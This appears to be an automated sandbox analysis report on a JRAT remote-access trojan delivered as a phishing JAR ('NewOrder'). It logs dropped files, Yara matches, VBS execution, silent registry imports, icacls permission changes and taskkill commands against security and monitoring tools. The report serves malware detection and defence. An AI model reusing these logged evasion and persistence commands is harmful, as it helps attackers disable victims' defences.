Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespacess
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/(
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/nt(
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://download.java.net/java/GA/jdk8u361/0ae14417abb444ebb02b9815e2103550/b09/ecc-8u-src.zip
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/LICENSE.txt
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/laodict.txt
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.io
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.ios
Source: xcopy.exe, 00000015.00000003.1742230987.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/MPL/2.0/.
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sourceforge.net/project/?group_id=1519

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Uses regedit.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Creates files inside the system directory
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Windows\SysWOW64\test.txt Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02983518 6_2_02983518
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_029C6D50 6_2_029C6D50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
PE file does not import any functions
Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Yara signature match
Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winJAR@196/300@1/2
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\zbrspjjraf.js Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
